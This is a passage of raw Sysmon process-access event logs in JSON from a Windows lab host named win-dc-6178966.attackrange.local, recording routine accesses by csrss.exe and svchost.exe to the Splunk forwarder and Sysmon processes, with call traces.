C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\system32\\basesrv.DLL+2f47|C:\\Windows\\SYSTEM32\\CSRSRV.dll+5645|C:\\Windows\\SYSTEM32\\ntdll.dll+6e87f","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 07:59:41.378","SourceProcessGUID":"{41C8662E-1F61-5F25-0000-0010E7420000}","SourceProcessId":"648","SourceThreadId":"772","SourceImage":"C:\\Windows\\system32\\csrss.exe","TargetProcessGUID":"{41C8662E-20ED-5F25-0000-0010A6440900}","TargetProcessId":"1212","TargetImage":"C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunk-admon.exe","GrantedAccess":"0x1fffff","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\system32\\basesrv.DLL+2f47|C:\\Windows\\SYSTEM32\\CSRSRV.dll+5645|C:\\Windows\\SYSTEM32\\ntdll.dll+6e87f","EventReceivedTime":"2020-08-01 07:59:42","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 07:59:41","Hostname":"win-dc-6178966.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":5943,"ProcessID":2804,"ThreadID":3356,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 07:59:41.378\r\nSourceProcessGUID: {41C8662E-1F63-5F25-0000-0010C3650000}\r\nSourceProcessId: 612\r\nSourceThreadId: 732\r\nSourceImage: C:\\Windows\\system32\\svchost.exe\r\nTargetProcessGUID: {41C8662E-1F73-5F25-0000-0010A2BC0200}\r\nTargetProcessId: 2804\r\nTargetImage: C:\\Windows\\sysmon64.exe\r\nGrantedAccess: 0x1400\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+12343|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 07:59:41.378","SourceProcessGUID":"{41C8662E-1F63-5F25-0000-0010C3650000}","SourceProcessId":"612","SourceThreadId":"732","SourceImage":"C:\\Windows\\system32\\svchost.exe","TargetProcessGUID":"{41C8662E-1F73-5F25-0000-0010A2BC0200}","TargetProcessId":"2804","TargetImage":"C:\\Windows\\sysmon64.exe","GrantedAccess":"0x1400","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+12343|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 07:59:42","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 07:59:41","Hostname":"win-dc-6178966.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":5944,"ProcessID":2804,"ThreadID":3356,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 07:59:41.378\r\nSourceProcessGUID: {41C8662E-1F63-5F25-0000-0010C3650000}\r\nSourceProcessId: 612\r\nSourceThreadId: 732\r\nSourceImage: C:\\Windows\\system32\\svchost.exe\r\nTargetProcessGUID: {41C8662E-1F73-5F25-0000-0010A2BC0200}\r\nTargetProcessId: 2804\r\nTargetImage: C:\\Windows\\sysmon64.exe\r\nGrantedAccess: 0x1400\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+11378|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 07:59:41.378","SourceProcessGUID":"{41C8662E-1F63-5F25-0000-0010C3650000}","SourceProcessId":"612","SourceThreadId":"732","SourceImage":"C:\\Windows\\system32\\svchost.exe","TargetProcessGUID":"{41C8662E-1F73-5F25-0000-0010A2BC0200}","TargetProcessId":"2804","TargetImage":"C:\\Windows\\sysmon64.exe","GrantedAccess":"0x1400","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+11378|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 07:59:42","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 07:59:41","Hostname":"win-dc-6178966.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":5945,"ProcessID":2804,"ThreadID":3356,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 07:59:41.378\r\nSourceProcessGUID: {41C8662E-1F63-5F25-0000-0010C3650000}\r\nSourceProcessId: 612\r\nSourceThreadId: 732\r\nSourceImage: C:\\Windows\\system32\\svchost.exe\r\nTargetProcessGUID: {41C8662E-1F73-5F25-0000-0010A2BC0200}\r\nTargetProcessId: 2804\r\nTargetImage: C:\\Windows\\sysmon64.exe\r\nGrantedAccess: 0x1400\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+11dcd|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 07:59:41.378","SourceProcessGUID":"{41C8662E-1F63-5F25-0000-0010C3650000}","SourceProcessId":"612","SourceThreadId":"732","SourceImage":"C:\\Windows\\system32\\svchost.exe","TargetProcessGUID":"{41C8662E-1F73-5F25-0000-0010A2BC0200}","TargetProcessId":"2804","TargetImage":"C:\\Windows\\sysmon64.exe","GrantedAccess":"0x1400","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+11dcd|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 07:59:42","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 07:59:41","Hostname":"win-dc-6178966.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":5946,"ProcessID":2804,"ThreadID":3356,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 07:59:41.378\r\nSourceProcessGUID: {41C8662E-1F63-5F25-0000-0010C3650000}\r\nSourceProcessId: 612\r\nSourceThreadId: 732\r\nSourceImage: C:\\Windows\\system32\\svchost.exe\r\nTargetProcessGUID: {41C8662E-1F73-5F25-0000-0010A2BC0200}\r\nTargetProcessId: 2804\r\nTargetImage: C:\\Windows\\sysmon64.exe\r\nGrantedAccess: 0x1400\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+ecf6|c:\\windows\\system32\\lsm.dll+918f|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 07:59:41.378","SourceProcessGUID":"{41C8662E-1F63-5F25-0000-0010C3650000}","SourceProcessId":"612","SourceThreadId":"732","SourceImage":"C:\\Windows\\system32\\svchost.exe","TargetProcessGUID":"{41C8662E-1F73-5F25-0000-0010A2BC0200}","TargetProcessId":"2804","TargetImage":"C:\\Windows\\sysmon64.exe","GrantedAccess":"0x1400","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+ecf6|c:\\windows\\system32\\lsm.dll+918f|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 07:59:42","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 07:59:41","Hostname":"win-dc-6178966.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":5947,"ProcessID":2804,"ThreadID":3356,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 07:59:41.378\r\nSourceProcessGUID: {41C8662E-1F63-5F25-0000-0010C3650000}\r\nSourceProcessId: 612\r\nSourceThreadId: 732\r\nSourceImage: C:\\Windows\\system32\\svchost.exe\r\nTargetProcessGUID: {41C8662E-1F73-5F25-0000-0010A2BC0200}\r\nTargetProcessId: 2804\r\nTargetImage: C:\\Windows\\sysmon64.exe\r\nGrantedAccess: 0x1400\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+ecf6|c:\\windows\\system32\\lsm.dll+92e1|c:\\windows\\system32\\lsm.dll+91d0|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 07:59:41.378","SourceProcessGUID":"{41C8662E-1F63-5F25-0000-0010C3650000}","SourceProcessId":"612","SourceThreadId":"732","SourceImage":"C:\\Windows\\system32\\svchost.exe","TargetProcessGUID":"{41C8662E-1F73-5F25-0000-0010A2BC0200}","TargetProcessId":"2804","TargetImage":"C:\\Windows\\sysmon64.exe","GrantedAccess":"0x1400","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+ecf6|c:\\windows\\system32\\lsm.dll+92e1|c:\\windows\\system32\\lsm.dll+91d0|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 07:59:42","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 07:59:41","Hostname":"win-dc-6178966.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":5948,"ProcessID":2804,"ThreadID":3356,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 07:59:41.378\r\nSourceProcessGUID: {41C8662E-1F63-5F25-0000-0010C3650000}\r\nSourceProcessId: 612\r\nSourceThreadId: 732\r\nSourceImage: C:\\Windows\\system32\\svchost.exe\r\nTargetProcessGUID: {41C8662E-1F73-5F25-0000-0010A2BC0200}\r\nTargetProcessId: 2804\r\nTargetImage: C:\\Windows\\sysmon64.exe\r\nGrantedAccess: 0x1400\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+12343|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 07:59:41.378","SourceProcessGUID":"{41C8662E-1F63-5F25-0000-0010C3650000}","SourceProcessId":"612","SourceThreadId":"732","SourceImage":"C:\\Windows\\system32\\svchost.exe","TargetProcessGUID":"{41C8662E-1F73-5F25-0000-0010A2BC0200}","TargetProcessId":"2804","TargetImage":"C:\\Windows\\sysmon64.exe","GrantedAccess":"0x1400","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+12343|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 07:59:42","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 07:59:41","Hostname":"win-dc-6178966.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":5949,"ProcessID":2804,"ThreadID":3356,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 07:59:41.378\r\nSourceProcessGUID: {41C8662E-1F63-5F25-0000-0010C3650000}\r\nSourceProcessId: 612\r\nSourceThreadId: 732\r\nSourceImage: C:\\Windows\\system32\\svchost.exe\r\nTargetProcessGUID: {41C8662E-1F73-5F25-0000-0010A2BC0200}\r\nTargetProcessId: 2804\r\nTargetImage: C:\\Windows\\sysmon64.exe\r\nGrantedAccess: 0x1400\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+11378|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 07:59:41.378","SourceProcessGUID":"{41C8662E-1F63-5F25-0000-0010C3650000}","SourceProcessId":"612","SourceThreadId":"732","SourceImage":"C:\\Windows\\system32\\svchost.exe","TargetProcessGUID":"{41C8662E-1F73-5F25-0000-0010A2BC0200}","TargetProcessId":"2804","TargetImage":"C:\\Windows\\sysmon64.exe","GrantedAccess":"0x1400","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+11378|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 07:59:42","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 07:59:41","Hostname":"win-dc-6178966.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":5950,"ProcessID":2804,"ThreadID":3356,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 07:59:41.378\r\nSourceProcessGUID: {41C8662E-1F63-5F25-0000-0010C3650000}\r\nSourceProcessId: 612\r\nSourceThreadId: 732\r\nSourceImage: C:\\Windows\\system32\\svchost.exe\r\nTargetProcessGUID: {41C8662E-1F73-5F25-0000-0010A2BC0200}\r\nTargetProcessId: 2804\r\nTargetImage: C:\\Windows\\sysmon64.exe\r\nGrantedAccess: 0x1400\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+11dcd|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 